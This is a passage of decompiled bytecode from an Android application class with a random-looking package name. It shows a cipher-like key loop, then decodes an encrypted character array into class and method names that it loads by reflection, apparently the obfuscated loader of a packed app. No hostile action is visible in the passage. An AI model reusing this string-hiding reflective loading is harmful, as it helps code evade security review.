  3777.     //   4789: aload 12
  3778.     //   4791: bipush 96
  3779.     //   4793: baload
  3780.     //   4794: iand
  3781.     //   4795: baload
  3782.     //   4796: bastore
  3783.     //   4797: aload 10
  3784.     //   4799: bipush 12
  3785.     //   4801: aload 11
  3786.     //   4803: sipush 255
  3787.     //   4806: aload 12
  3788.     //   4808: sipush 227
  3789.     //   4811: baload
  3790.     //   4812: iand
  3791.     //   4813: baload
  3792.     //   4814: bastore
  3793.     //   4815: aload 10
  3794.     //   4817: bipush 13
  3795.     //   4819: aload 11
  3796.     //   4821: sipush 255
  3797.     //   4824: aload 12
  3798.     //   4826: sipush 169
  3799.     //   4829: baload
  3800.     //   4830: iand
  3801.     //   4831: baload
  3802.     //   4832: bastore
  3803.     //   4833: aload 10
  3804.     //   4835: bipush 14
  3805.     //   4837: aload 11
  3806.     //   4839: sipush 255
  3807.     //   4842: aload 12
  3808.     //   4844: bipush 127
  3809.     //   4846: baload
  3810.     //   4847: iand
  3811.     //   4848: baload
  3812.     //   4849: bastore
  3813.     //   4850: aload 10
  3814.     //   4852: bipush 15
  3815.     //   4854: aload 11
  3816.     //   4856: sipush 255
  3817.     //   4859: aload 12
  3818.     //   4861: bipush 79
  3819.     //   4863: baload
  3820.     //   4864: iand
  3821.     //   4865: baload
  3822.     //   4866: bastore
  3823.     //   4867: aload 38
  3824.     //   4869: athrow
  3825.     //   4870: iconst_4
  3826.     //   4871: istore 31
  3827.     //   4873: iload 31
  3828.     //   4875: bipush 44
  3829.     //   4877: if_icmpge +98 -> 4975
  3830.     //   4880: iconst_4
  3831.     //   4881: iload 31
  3832.     //   4883: iconst_1
  3833.     //   4884: isub
  3834.     //   4885: iconst_2
  3835.     //   4886: ishr
  3836.     //   4887: imul
  3837.     //   4888: iconst_3
  3838.     //   4889: iload 31
  3839.     //   4891: iconst_1
  3840.     //   4892: isub
  3841.     //   4893: iand
  3842.     //   4894: iadd
  3843.     //   4895: istore 32
  3844.     //   4897: aload 14
  3845.     //   4899: iload 32
  3846.     //   4901: iaload
  3847.     //   4902: istore 34
  3848.     //   4904: iload 31
  3849.     //   4906: iconst_4
  3850.     //   4907: irem
  3851.     //   4908: ifne +26 -> 4934
  3852.     //   4911: aload_1
  3853.     //   4912: iload 34
  3854.     //   4914: bipush 8
  3855.     //   4916: invokestatic 485 com/wvydyg/zrhysbu/Application:onCreate (II)I
  3856.     //   4919: invokestatic 487 com/wvydyg/zrhysbu/Application:attachBaseContext    ([BI)I
  3857.     //   4922: aload 6
  3858.     //   4924: iconst_m1
  3859.     //   4925: iload 31
  3860.     //   4927: iconst_4
  3861.     //   4928: idiv
  3862.     //   4929: iadd
  3863.     //   4930: iaload
  3864.     //   4931: ixor
  3865.     //   4932: istore 34
  3866.     //   4934: aload 14
  3867.     //   4936: iconst_4
  3868.     //   4937: iload 31
  3869.     //   4939: iconst_2
  3870.     //   4940: ishr
  3871.     //   4941: imul
  3872.     //   4942: iload 31
  3873.     //   4944: iconst_3
  3874.     //   4945: iand
  3875.     //   4946: iadd
  3876.     //   4947: iload 34
  3877.     //   4949: aload 14
  3878.     //   4951: iconst_4
  3879.     //   4952: iload 31
  3880.     //   4954: iconst_4
  3881.     //   4955: isub
  3882.     //   4956: iconst_2
  3883.     //   4957: ishr
  3884.     //   4958: imul
  3885.     //   4959: iconst_3
  3886.     //   4960: iload 31
  3887.     //   4962: iconst_4
  3888.     //   4963: isub
  3889.     //   4964: iand
  3890.     //   4965: iadd
  3891.     //   4966: iaload
  3892.     //   4967: ixor
  3893.     //   4968: iastore
  3894.     //   4969: iinc 31 1
  3895.     //   4972: goto -99 -> 4873
  3896.     //   4975: iconst_4
  3897.     //   4976: newarray int
  3898.     //   4978: dup
  3899.     //   4979: iconst_0
  3900.     //   4980: ldc_w 488
  3901.     //   4983: iastore
  3902.     //   4984: dup
  3903.     //   4985: iconst_1
  3904.     //   4986: ldc_w 489
  3905.     //   4989: iastore
  3906.     //   4990: dup
  3907.     //   4991: iconst_2
  3908.     //   4992: ldc_w 490
  3909.     //   4995: iastore
  3910.     //   4996: dup
  3911.     //   4997: iconst_3
  3912.     //   4998: ldc_w 491
  3913.     //   5001: iastore
  3914.     //   5002: astore 16
  3915.     //   5004: bipush 13
  3916.     //   5006: anewarray 99 java/lang/Object
  3917.     //   5009: astore 17
  3918.     //   5011: aload 17
  3919.     //   5013: iconst_0
  3920.     //   5014: aload_1
  3921.     //   5015: aastore
  3922.     //   5016: aload 17
  3923.     //   5018: iconst_1
  3924.     //   5019: aload_2
  3925.     //   5020: aastore
  3926.     //   5021: aload 17
  3927.     //   5023: iconst_2
  3928.     //   5024: aload_3
  3929.     //   5025: aastore
  3930.     //   5026: aload 17
  3931.     //   5028: iconst_3
  3932.     //   5029: aload 4
  3933.     //   5031: aastore
  3934.     //   5032: aload 17
  3935.     //   5034: iconst_4
  3936.     //   5035: aload 5
  3937.     //   5037: aastore
  3938.     //   5038: aload 17
  3939.     //   5040: iconst_5
  3940.     //   5041: aload 14
  3941.     //   5043: aastore
  3942.     //   5044: aload 17
  3943.     //   5046: bipush 6
  3944.     //   5048: aload 16
  3945.     //   5050: aastore
  3946.     //   5051: sipush 176
  3947.     //   5054: newarray char
  3948.     //   5056: dup
  3949.     //   5057: iconst_0
  3950.     //   5058: ldc_w 449
  3951.     //   5061: castore
  3952.     //   5062: dup
  3953.     //   5063: iconst_1
  3954.     //   5064: ldc_w 337
  3955.     //   5067: castore
  3956.     //   5068: dup
  3957.     //   5069: iconst_2
  3958.     //   5070: ldc_w 492
  3959.     //   5073: castore
  3960.     //   5074: dup
  3961.     //   5075: iconst_3
  3962.     //   5076: ldc_w 305
  3963.     //   5079: castore
  3964.     //   5080: dup
  3965.     //   5081: iconst_4
  3966.     //   5082: ldc_w 392
  3967.     //   5085: castore
  3968.     //   5086: dup
  3969.     //   5087: iconst_5
  3970.     //   5088: ldc_w 300
  3971.     //   5091: castore
  3972.     //   5092: dup
  3973.     //   5093: bipush 6
  3974.     //   5095: ldc_w 481
  3975.     //   5098: castore
  3976.     //   5099: dup
  3977.     //   5100: bipush 7
  3978.     //   5102: ldc_w 404
  3979.     //   5105: castore
  3980.     //   5106: dup
  3981.     //   5107: bipush 8
  3982.     //   5109: ldc_w 318
  3983.     //   5112: castore
  3984.     //   5113: dup
  3985.     //   5114: bipush 9
  3986.     //   5116: ldc_w 316
  3987.     //   5119: castore
  3988.     //   5120: dup
  3989.     //   5121: bipush 10
  3990.     //   5123: ldc_w 493
  3991.     //   5126: castore
  3992.     //   5127: dup
  3993.     //   5128: bipush 11
  3994.     //   5130: ldc_w 343
  3995.     //   5133: castore
  3996.     //   5134: dup
  3997.     //   5135: bipush 12
  3998.     //   5137: ldc_w 494
  3999.     //   5140: castore
  4000.     //   5141: dup
  4001.     //   5142: bipush 13
  4002.     //   5144: ldc_w 279
  4003.     //   5147: castore
  4004.     //   5148: dup
  4005.     //   5149: bipush 14
  4006.     //   5151: ldc_w 331
  4007.     //   5154: castore
  4008.     //   5155: dup
  4009.     //   5156: bipush 15
  4010.     //   5158: ldc_w 392
  4011.     //   5161: castore
  4012.     //   5162: dup
  4013.     //   5163: bipush 16
  4014.     //   5165: ldc_w 404
  4015.     //   5168: castore
  4016.     //   5169: dup
  4017.     //   5170: bipush 17
  4018.     //   5172: ldc_w 495
  4019.     //   5175: castore
  4020.     //   5176: dup
  4021.     //   5177: bipush 18
  4022.     //   5179: ldc_w 496
  4023.     //   5182: castore
  4024.     //   5183: dup
  4025.     //   5184: bipush 19
  4026.     //   5186: ldc_w 497
  4027.     //   5189: castore
  4028.     //   5190: dup
  4029.     //   5191: bipush 20
  4030.     //   5193: ldc_w 413
  4031.     //   5196: castore
  4032.     //   5197: dup
  4033.     //   5198: bipush 21
  4034.     //   5200: ldc_w 498
  4035.     //   5203: castore
  4036.     //   5204: dup
  4037.     //   5205: bipush 22
  4038.     //   5207: ldc_w 367
  4039.     //   5210: castore
  4040.     //   5211: dup
  4041.     //   5212: bipush 23
  4042.     //   5214: ldc_w 271
  4043.     //   5217: castore
  4044.     //   5218: dup
  4045.     //   5219: bipush 24
  4046.     //   5221: ldc_w 499
  4047.     //   5224: castore
  4048.     //   5225: dup
  4049.     //   5226: bipush 25
  4050.     //   5228: ldc_w 333
  4051.     //   5231: castore
  4052.     //   5232: dup
  4053.     //   5233: bipush 26
  4054.     //   5235: ldc_w 500
  4055.     //   5238: castore
  4056.     //   5239: dup
  4057.     //   5240: bipush 27
  4058.     //   5242: ldc_w 285
  4059.     //   5245: castore
  4060.     //   5246: dup
  4061.     //   5247: bipush 28
  4062.     //   5249: ldc_w 501
  4063.     //   5252: castore
  4064.     //   5253: dup
  4065.     //   5254: bipush 29
  4066.     //   5256: ldc_w 260
  4067.     //   5259: castore
  4068.     //   5260: dup
  4069.     //   5261: bipush 30
  4070.     //   5263: ldc_w 502
  4071.     //   5266: castore
  4072.     //   5267: dup
  4073.     //   5268: bipush 31
  4074.     //   5270: ldc_w 340
  4075.     //   5273: castore
  4076.     //   5274: dup
  4077.     //   5275: bipush 32
  4078.     //   5277: ldc_w 306
  4079.     //   5280: castore
  4080.     //   5281: dup
  4081.     //   5282: bipush 33
  4082.     //   5284: ldc_w 407
  4083.     //   5287: castore
  4084.     //   5288: dup
  4085.     //   5289: bipush 34
  4086.     //   5291: ldc_w 394
  4087.     //   5294: castore
  4088.     //   5295: dup
  4089.     //   5296: bipush 35
  4090.     //   5298: ldc_w 503
  4091.     //   5301: castore
  4092.     //   5302: dup
  4093.     //   5303: bipush 36
  4094.     //   5305: ldc_w 504
  4095.     //   5308: castore
  4096.     //   5309: dup
  4097.     //   5310: bipush 37
  4098.     //   5312: ldc_w 504
  4099.     //   5315: castore
  4100.     //   5316: dup
  4101.     //   5317: bipush 38
  4102.     //   5319: ldc_w 505
  4103.     //   5322: castore
  4104.     //   5323: dup
  4105.     //   5324: bipush 39
  4106.     //   5326: ldc_w 506
  4107.     //   5329: castore
  4108.     //   5330: dup
  4109.     //   5331: bipush 40
  4110.     //   5333: ldc_w 507
  4111.     //   5336: castore
  4112.     //   5337: dup
  4113.     //   5338: bipush 41
  4114.     //   5340: ldc_w 508
  4115.     //   5343: castore
  4116.     //   5344: dup
  4117.     //   5345: bipush 42
  4118.     //   5347: ldc_w 311
  4119.     //   5350: castore
  4120.     //   5351: dup
  4121.     //   5352: bipush 43
  4122.     //   5354: ldc_w 417
  4123.     //   5357: castore
  4124.     //   5358: dup
  4125.     //   5359: bipush 44
  4126.     //   5361: ldc_w 509
  4127.     //   5364: castore
  4128.     //   5365: dup
  4129.     //   5366: bipush 45
  4130.     //   5368: ldc_w 404
  4131.     //   5371: castore
  4132.     //   5372: dup
  4133.     //   5373: bipush 46
  4134.     //   5375: ldc_w 372
  4135.     //   5378: castore
  4136.     //   5379: dup
  4137.     //   5380: bipush 47
  4138.     //   5382: ldc_w 494
  4139.     //   5385: castore
  4140.     //   5386: dup
  4141.     //   5387: bipush 48
  4142.     //   5389: ldc_w 510
  4143.     //   5392: castore
  4144.     //   5393: dup
  4145.     //   5394: bipush 49
  4146.     //   5396: ldc_w 297
  4147.     //   5399: castore
  4148.     //   5400: dup
  4149.     //   5401: bipush 50
  4150.     //   5403: ldc_w 511
  4151.     //   5406: castore
  4152.     //   5407: dup
  4153.     //   5408: bipush 51
  4154.     //   5410: ldc_w 512
  4155.     //   5413: castore
  4156.     //   5414: dup
  4157.     //   5415: bipush 52
  4158.     //   5417: ldc_w 339
  4159.     //   5420: castore
  4160.     //   5421: dup
  4161.     //   5422: bipush 53
  4162.     //   5424: ldc_w 513
  4163.     //   5427: castore
  4164.     //   5428: dup
  4165.     //   5429: bipush 54
  4166.     //   5431: ldc_w 514
  4167.     //   5434: castore
  4168.     //   5435: dup
  4169.     //   5436: bipush 55
  4170.     //   5438: ldc_w 258
  4171.     //   5441: castore
  4172.     //   5442: dup
  4173.     //   5443: bipush 56
  4174.     //   5445: ldc_w 316
  4175.     //   5448: castore
  4176.     //   5449: dup
  4177.     //   5450: bipush 57
  4178.     //   5452: ldc_w 515
  4179.     //   5455: castore
  4180.     //   5456: dup
  4181.     //   5457: bipush 58
  4182.     //   5459: ldc_w 516
  4183.     //   5462: castore
  4184.     //   5463: dup
  4185.     //   5464: bipush 59
  4186.     //   5466: ldc_w 517
  4187.     //   5469: castore
  4188.     //   5470: dup
  4189.     //   5471: bipush 60
  4190.     //   5473: ldc_w 428
  4191.     //   5476: castore
  4192.     //   5477: dup
  4193.     //   5478: bipush 61
  4194.     //   5480: ldc_w 518
  4195.     //   5483: castore
  4196.     //   5484: dup
  4197.     //   5485: bipush 62
  4198.     //   5487: ldc_w 508
  4199.     //   5490: castore
  4200.     //   5491: dup
  4201.     //   5492: bipush 63
  4202.     //   5494: ldc_w 413
  4203.     //   5497: castore
  4204.     //   5498: dup
  4205.     //   5499: bipush 64
  4206.     //   5501: ldc_w 519
  4207.     //   5504: castore
  4208.     //   5505: dup
  4209.     //   5506: bipush 65
  4210.     //   5508: ldc_w 380
  4211.     //   5511: castore
  4212.     //   5512: dup
  4213.     //   5513: bipush 66
  4214.     //   5515: ldc_w 520
  4215.     //   5518: castore
  4216.     //   5519: dup
  4217.     //   5520: bipush 67
  4218.     //   5522: ldc_w 381
  4219.     //   5525: castore
  4220.     //   5526: dup
  4221.     //   5527: bipush 68
  4222.     //   5529: ldc_w 513
  4223.     //   5532: castore
  4224.     //   5533: dup
  4225.     //   5534: bipush 69
  4226.     //   5536: ldc_w 508
  4227.     //   5539: castore
  4228.     //   5540: dup
  4229.     //   5541: bipush 70
  4230.     //   5543: ldc_w 521
  4231.     //   5546: castore
  4232.     //   5547: dup
  4233.     //   5548: bipush 71
  4234.     //   5550: ldc_w 522
  4235.     //   5553: castore
  4236.     //   5554: dup
  4237.     //   5555: bipush 72
  4238.     //   5557: ldc_w 289
  4239.     //   5560: castore
  4240.     //   5561: dup
  4241.     //   5562: bipush 73
  4242.     //   5564: ldc_w 269
  4243.     //   5567: castore
  4244.     //   5568: dup
  4245.     //   5569: bipush 74
  4246.     //   5571: ldc_w 459
  4247.     //   5574: castore
  4248.     //   5575: dup
  4249.     //   5576: bipush 75
  4250.     //   5578: ldc_w 523
  4251.     //   5581: castore
  4252.     //   5582: dup
  4253.     //   5583: bipush 76
  4254.     //   5585: ldc_w 524
  4255.     //   5588: castore
  4256.     //   5589: dup
  4257.     //   5590: bipush 77
  4258.     //   5592: ldc_w 500
  4259.     //   5595: castore
  4260.     //   5596: dup
  4261.     //   5597: bipush 78
  4262.     //   5599: ldc_w 525
  4263.     //   5602: castore
  4264.     //   5603: dup
  4265.     //   5604: bipush 79
  4266.     //   5606: ldc_w 463
  4267.     //   5609: castore
  4268.     //   5610: dup
  4269.     //   5611: bipush 80
  4270.     //   5613: ldc_w 463
  4271.     //   5616: castore
  4272.     //   5617: dup
  4273.     //   5618: bipush 81
  4274.     //   5620: ldc_w 526
  4275.     //   5623: castore
  4276.     //   5624: dup
  4277.     //   5625: bipush 82
  4278.     //   5627: ldc_w 527
  4279.     //   5630: castore
  4280.     //   5631: dup
  4281.     //   5632: bipush 83
  4282.     //   5634: ldc_w 461
  4283.     //   5637: castore
  4284.     //   5638: dup
  4285.     //   5639: bipush 84
  4286.     //   5641: ldc_w 528
  4287.     //   5644: castore
  4288.     //   5645: dup
  4289.     //   5646: bipush 85
  4290.     //   5648: ldc_w 529
  4291.     //   5651: castore
  4292.     //   5652: dup
  4293.     //   5653: bipush 86
  4294.     //   5655: ldc_w 297
  4295.     //   5658: castore
  4296.     //   5659: dup
  4297.     //   5660: bipush 87
  4298.     //   5662: ldc_w 530
  4299.     //   5665: castore
  4300.     //   5666: dup
  4301.     //   5667: bipush 88
  4302.     //   5669: ldc_w 518
  4303.     //   5672: castore
  4304.     //   5673: dup
  4305.     //   5674: bipush 89
  4306.     //   5676: ldc_w 260
  4307.     //   5679: castore
  4308.     //   5680: dup
  4309.     //   5681: bipush 90
  4310.     //   5683: ldc_w 375
  4311.     //   5686: castore
  4312.     //   5687: dup
  4313.     //   5688: bipush 91
  4314.     //   5690: ldc_w 502
  4315.     //   5693: castore
  4316.     //   5694: dup
  4317.     //   5695: bipush 92
  4318.     //   5697: ldc_w 531
  4319.     //   5700: castore
  4320.     //   5701: dup
  4321.     //   5702: bipush 93
  4322.     //   5704: ldc_w 378
  4323.     //   5707: castore
  4324.     //   5708: dup
  4325.     //   5709: bipush 94
  4326.     //   5711: ldc_w 395
  4327.     //   5714: castore
  4328.     //   5715: dup
  4329.     //   5716: bipush 95
  4330.     //   5718: ldc_w 306
  4331.     //   5721: castore
  4332.     //   5722: dup
  4333.     //   5723: bipush 96
  4334.     //   5725: ldc_w 294
  4335.     //   5728: castore
  4336.     //   5729: dup
  4337.     //   5730: bipush 97
  4338.     //   5732: ldc_w 532
  4339.     //   5735: castore
  4340.     //   5736: dup
  4341.     //   5737: bipush 98
  4342.     //   5739: ldc_w 369
  4343.     //   5742: castore
  4344.     //   5743: dup
  4345.     //   5744: bipush 99
  4346.     //   5746: ldc_w 533
  4347.     //   5749: castore
  4348.     //   5750: dup
  4349.     //   5751: bipush 100
  4350.     //   5753: ldc_w 534
  4351.     //   5756: castore
  4352.     //   5757: dup
  4353.     //   5758: bipush 101
  4354.     //   5760: ldc_w 368
  4355.     //   5763: castore
  4356.     //   5764: dup
  4357.     //   5765: bipush 102
  4358.     //   5767: ldc_w 535
  4359.     //   5770: castore
  4360.     //   5771: dup
  4361.     //   5772: bipush 103
  4362.     //   5774: ldc_w 314
  4363.     //   5777: castore
  4364.     //   5778: dup
  4365.     //   5779: bipush 104
  4366.     //   5781: ldc_w 471
  4367.     //   5784: castore
  4368.     //   5785: dup
  4369.     //   5786: bipush 105
  4370.     //   5788: ldc_w 267
  4371.     //   5791: castore
  4372.     //   5792: dup
  4373.     //   5793: bipush 106
  4374.     //   5795: ldc_w 496
  4375.     //   5798: castore
  4376.     //   5799: dup
  4377.     //   5800: bipush 107
  4378.     //   5802: ldc_w 340
  4379.     //   5805: castore
  4380.     //   5806: dup
  4381.     //   5807: bipush 108
  4382.     //   5809: ldc_w 290
  4383.     //   5812: castore
  4384.     //   5813: dup
  4385.     //   5814: bipush 109
  4386.     //   5816: ldc_w 454
  4387.     //   5819: castore
  4388.     //   5820: dup
  4389.     //   5821: bipush 110
  4390.     //   5823: ldc_w 329
  4391.     //   5826: castore
  4392.     //   5827: dup
  4393.     //   5828: bipush 111
  4394.     //   5830: ldc_w 318
  4395.     //   5833: castore
  4396.     //   5834: dup
  4397.     //   5835: bipush 112
  4398.     //   5837: ldc_w 475
  4399.     //   5840: castore
  4400.     //   5841: dup
  4401.     //   5842: bipush 113
  4402.     //   5844: ldc_w 446
  4403.     //   5847: castore
  4404.     //   5848: dup
  4405.     //   5849: bipush 114
  4406.     //   5851: ldc_w 287
  4407.     //   5854: castore
  4408.     //   5855: dup
  4409.     //   5856: bipush 115
  4410.     //   5858: ldc_w 356
  4411.     //   5861: castore
  4412.     //   5862: dup
  4413.     //   5863: bipush 116
  4414.     //   5865: ldc_w 260
  4415.     //   5868: castore
  4416.     //   5869: dup
  4417.     //   5870: bipush 117
  4418.     //   5872: ldc_w 439
  4419.     //   5875: castore
  4420.     //   5876: dup
  4421.     //   5877: bipush 118
  4422.     //   5879: ldc_w 526
  4423.     //   5882: castore
  4424.     //   5883: dup
  4425.     //   5884: bipush 119
  4426.     //   5886: ldc_w 324
  4427.     //   5889: castore
  4428.     //   5890: dup
  4429.     //   5891: bipush 120
  4430.     //   5893: ldc_w 287
  4431.     //   5896: castore
  4432.     //   5897: dup
  4433.     //   5898: bipush 121
  4434.     //   5900: ldc_w 536
  4435.     //   5903: castore
  4436.     //   5904: dup
  4437.     //   5905: bipush 122
  4438.     //   5907: ldc_w 512
  4439.     //   5910: castore
  4440.     //   5911: dup
  4441.     //   5912: bipush 123
  4442.     //   5914: ldc_w 279
  4443.     //   5917: castore
  4444.     //   5918: dup
  4445.     //   5919: bipush 124
  4446.     //   5921: ldc_w 537
  4447.     //   5924: castore
  4448.     //   5925: dup
  4449.     //   5926: bipush 125
  4450.     //   5928: ldc_w 538
  4451.     //   5931: castore
  4452.     //   5932: dup
  4453.     //   5933: bipush 126
  4454.     //   5935: ldc_w 347
  4455.     //   5938: castore
  4456.     //   5939: dup
  4457.     //   5940: bipush 127
  4458.     //   5942: ldc_w 539
  4459.     //   5945: castore
  4460.     //   5946: dup
  4461.     //   5947: sipush 128
  4462.     //   5950: ldc_w 260
  4463.     //   5953: castore
  4464.     //   5954: dup
  4465.     //   5955: sipush 129
  4466.     //   5958: ldc_w 540
  4467.     //   5961: castore
  4468.     //   5962: dup
  4469.     //   5963: sipush 130
  4470.     //   5966: ldc_w 541
  4471.     //   5969: castore
  4472.     //   5970: dup
  4473.     //   5971: sipush 131
  4474.     //   5974: ldc_w 441
  4475.     //   5977: castore
  4476.     //   5978: dup
  4477.     //   5979: sipush 132
  4478.     //   5982: ldc_w 413
  4479.     //   5985: castore
  4480.     //   5986: dup
  4481.     //   5987: sipush 133
  4482.     //   5990: ldc_w 542
  4483.     //   5993: castore
  4484.     //   5994: dup
  4485.     //   5995: sipush 134
  4486.     //   5998: ldc_w 543
  4487.     //   6001: castore
  4488.     //   6002: dup
  4489.     //   6003: sipush 135
  4490.     //   6006: ldc_w 526
  4491.     //   6009: castore
  4492.     //   6010: dup
  4493.     //   6011: sipush 136
  4494.     //   6014: ldc_w 269
  4495.     //   6017: castore
  4496.     //   6018: dup
  4497.     //   6019: sipush 137
  4498.     //   6022: ldc_w 544
  4499.     //   6025: castore
  4500.     //   6026: dup
  4501.     //   6027: sipush 138
  4502.     //   6030: ldc_w 545
  4503.     //   6033: castore
  4504.     //   6034: dup
  4505.     //   6035: sipush 139
  4506.     //   6038: ldc_w 520
  4507.     //   6041: castore
  4508.     //   6042: dup
  4509.     //   6043: sipush 140
  4510.     //   6046: ldc_w 542
  4511.     //   6049: castore
  4512.     //   6050: dup
  4513.     //   6051: sipush 141
  4514.     //   6054: ldc_w 546
  4515.     //   6057: castore
  4516.     //   6058: dup
  4517.     //   6059: sipush 142
  4518.     //   6062: ldc_w 521
  4519.     //   6065: castore
  4520.     //   6066: dup
  4521.     //   6067: sipush 143
  4522.     //   6070: ldc_w 329
  4523.     //   6073: castore
  4524.     //   6074: dup
  4525.     //   6075: sipush 144
  4526.     //   6078: ldc_w 459
  4527.     //   6081: castore
  4528.     //   6082: dup
  4529.     //   6083: sipush 145
  4530.     //   6086: ldc_w 347
  4531.     //   6089: castore
  4532.     //   6090: dup
  4533.     //   6091: sipush 146
  4534.     //   6094: ldc_w 547
  4535.     //   6097: castore
  4536.     //   6098: dup
  4537.     //   6099: sipush 147
  4538.     //   6102: ldc_w 314
  4539.     //   6105: castore
  4540.     //   6106: dup
  4541.     //   6107: sipush 148
  4542.     //   6110: ldc_w 548
  4543.     //   6113: castore
  4544.     //   6114: dup
  4545.     //   6115: sipush 149
  4546.     //   6118: ldc_w 313
  4547.     //   6121: castore
  4548.     //   6122: dup
  4549.     //   6123: sipush 150
  4550.     //   6126: ldc_w 311
  4551.     //   6129: castore
  4552.     //   6130: dup
  4553.     //   6131: sipush 151
  4554.     //   6134: ldc_w 319
  4555.     //   6137: castore
  4556.     //   6138: dup
  4557.     //   6139: sipush 152
  4558.     //   6142: ldc_w 436
  4559.     //   6145: castore
  4560.     //   6146: dup
  4561.     //   6147: sipush 153
  4562.     //   6150: ldc_w 332
  4563.     //   6153: castore
  4564.     //   6154: dup
  4565.     //   6155: sipush 154
  4566.     //   6158: ldc_w 537
  4567.     //   6161: castore
  4568.     //   6162: dup
  4569.     //   6163: sipush 155
  4570.     //   6166: ldc_w 511
  4571.     //   6169: castore
  4572.     //   6170: dup
  4573.     //   6171: sipush 156
  4574.     //   6174: ldc_w 549
  4575.     //   6177: castore
  4576.     //   6178: dup
  4577.     //   6179: sipush 157
  4578.     //   6182: ldc_w 550
  4579.     //   6185: castore
  4580.     //   6186: dup
  4581.     //   6187: sipush 158
  4582.     //   6190: ldc_w 538
  4583.     //   6193: castore
  4584.     //   6194: dup
  4585.     //   6195: sipush 159
  4586.     //   6198: ldc_w 526
  4587.     //   6201: castore
  4588.     //   6202: dup
  4589.     //   6203: sipush 160
  4590.     //   6206: ldc_w 551
  4591.     //   6209: castore
  4592.     //   6210: dup
  4593.     //   6211: sipush 161
  4594.     //   6214: ldc_w 396
  4595.     //   6217: castore
  4596.     //   6218: dup
  4597.     //   6219: sipush 162
  4598.     //   6222: ldc_w 335
  4599.     //   6225: castore
  4600.     //   6226: dup
  4601.     //   6227: sipush 163
  4602.     //   6230: ldc_w 540
  4603.     //   6233: castore
  4604.     //   6234: dup
  4605.     //   6235: sipush 164
  4606.     //   6238: ldc_w 303
  4607.     //   6241: castore
  4608.     //   6242: dup
  4609.     //   6243: sipush 165
  4610.     //   6246: ldc_w 552
  4611.     //   6249: castore
  4612.     //   6250: dup
  4613.     //   6251: sipush 166
  4614.     //   6254: ldc_w 356
  4615.     //   6257: castore
  4616.     //   6258: dup
  4617.     //   6259: sipush 167
  4618.     //   6262: ldc_w 553
  4619.     //   6265: castore
  4620.     //   6266: dup
  4621.     //   6267: sipush 168
  4622.     //   6270: ldc_w 543
  4623.     //   6273: castore
  4624.     //   6274: dup
  4625.     //   6275: sipush 169
  4626.     //   6278: ldc_w 513
  4627.     //   6281: castore
  4628.     //   6282: dup
  4629.     //   6283: sipush 170
  4630.     //   6286: ldc_w 458
  4631.     //   6289: castore
  4632.     //   6290: dup
  4633.     //   6291: sipush 171
  4634.     //   6294: ldc_w 481
  4635.     //   6297: castore
  4636.     //   6298: dup
  4637.     //   6299: sipush 172
  4638.     //   6302: ldc_w 383
  4639.     //   6305: castore
  4640.     //   6306: dup
  4641.     //   6307: sipush 173
  4642.     //   6310: ldc_w 449
  4643.     //   6313: castore
  4644.     //   6314: dup
  4645.     //   6315: sipush 174
  4646.     //   6318: ldc_w 524
  4647.     //   6321: castore
  4648.     //   6322: dup
  4649.     //   6323: sipush 175
  4650.     //   6326: ldc_w 525
  4651.     //   6329: castore
  4652.     //   6330: astore 18
  4653.     //   6332: iconst_0
  4654.     //   6333: istore 19
  4655.     //   6335: iload 19
  4656.     //   6337: aload 18
  4657.     //   6339: arraylength
  4658.     //   6340: if_icmpge +30 -> 6370
  4659.     //   6343: aload 18
  4660.     //   6345: iload 19
  4661.     //   6347: aload 18
  4662.     //   6349: iload 19
  4663.     //   6351: caload
  4664.     //   6352: aload 11
  4665.     //   6354: iload 19
  4666.     //   6356: aload 11
  4667.     //   6358: arraylength
  4668.     //   6359: irem
  4669.     //   6360: baload
  4670.     //   6361: isub
  4671.     //   6362: i2c
  4672.     //   6363: castore
  4673.     //   6364: iinc 19 1
  4674.     //   6367: goto -32 -> 6335
  4675.     //   6370: aload 17
  4676.     //   6372: bipush 7
  4677.     //   6374: aload 18
  4678.     //   6376: iconst_0
  4679.     //   6377: bipush 16
  4680.     //   6379: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4681.     //   6382: invokestatic 81  java/lang/Class:forName (Ljava/lang/String;)Ljava/lang/Class;
  4682.     //   6385: aload 18
  4683.     //   6387: bipush 16
  4684.     //   6389: bipush 13
  4685.     //   6391: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4686.     //   6394: aconst_null
  4687.     //   6395: invokevirtual 97 java/lang/Class:getMethod   (Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  4688.     //   6398: aastore
  4689.     //   6399: aload 17
  4690.     //   6401: bipush 8
  4691.     //   6403: aload 18
  4692.     //   6405: iconst_0
  4693.     //   6406: bipush 16
  4694.     //   6408: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4695.     //   6411: invokestatic 81  java/lang/Class:forName (Ljava/lang/String;)Ljava/lang/Class;
  4696.     //   6414: aload 18
  4697.     //   6416: bipush 29
  4698.     //   6418: bipush 13
  4699.     //   6420: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4700.     //   6423: aconst_null
  4701.     //   6424: invokevirtual 97 java/lang/Class:getMethod   (Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  4702.     //   6427: aastore
  4703.     //   6428: aload 17
  4704.     //   6430: bipush 9
  4705.     //   6432: aload 18
  4706.     //   6434: bipush 42
  4707.     //   6436: bipush 16
  4708.     //   6438: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4709.     //   6441: invokestatic 81  java/lang/Class:forName (Ljava/lang/String;)Ljava/lang/Class;
  4710.     //   6444: aload 18
  4711.     //   6446: bipush 58
  4712.     //   6448: bipush 11
  4713.     //   6450: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4714.     //   6453: aconst_null
  4715.     //   6454: invokevirtual 97 java/lang/Class:getMethod   (Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  4716.     //   6457: aastore
  4717.     //   6458: aload 17
  4718.     //   6460: bipush 10
  4719.     //   6462: aload 18
  4720.     //   6464: bipush 69
  4721.     //   6466: bipush 27
  4722.     //   6468: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4723.     //   6471: invokestatic 81  java/lang/Class:forName (Ljava/lang/String;)Ljava/lang/Class;
  4724.     //   6474: aload 18
  4725.     //   6476: bipush 96
  4726.     //   6478: bipush 12
  4727.     //   6480: invokestatic 556 java/lang/String:valueOf    ([CII)Ljava/lang/String;
  4728.     //   6483: aconst_null
